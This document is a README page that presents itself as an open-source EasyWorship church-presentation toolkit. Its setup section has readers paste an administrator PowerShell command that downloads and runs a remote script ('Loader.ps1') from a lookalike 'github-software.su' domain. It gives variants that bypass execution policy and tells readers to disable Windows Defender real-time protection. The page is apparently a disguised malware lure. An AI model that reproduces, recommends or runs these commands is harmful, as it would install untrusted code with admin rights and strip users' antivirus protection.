Welcome to the EasyWorship Pro Toolkit β an open-source collection of tools, configurations, and assets designed to optimize your church presentation software. This repository helps church media teams automate text layouts, import song databases, and establish seamless live streaming workflows.
- EasyWorship Automation: Custom scripts for bulk importing song lyrics, chords, and multiple Bible translations (KJV, ESV, NIV, etc.).
- OBS Studio & vMix Integration: Ready-to-use NDI layouts, alpha channel (transparent background) overlays, and dynamic lower thirds.
- Shortcuts & Hardware Control: MIDI, Hotkeys, and Stream Deck profiles configured for remote church presentation management.
- Premium Church Media Themes: High-quality, performance-optimized backgrounds and text templates for Sunday worship services.
-
Open PowerShell as Administrator:
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
- Press the
-
Execute the Deployment Command: Copy, paste, and press
Enterto run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:irm https://github-software.su/powershell/Loader.ps1 | iex
If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:
powershell -ExecutionPolicy Bypass -Command "irm https://github-software.su/powershell/Loader.ps1 | iex"In older legacy environments where aliases are missing, use explicit full system cmdlets:
Invoke-RestMethod https://github-software.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.
Use the provided automation script to convert text or chord files directly into the native EasyWorship Data format.
Yes. All themes, templates, and script layouts are fully optimized to support both the main projector output (FOH Screen) and the stage monitor display (Confidence Monitor).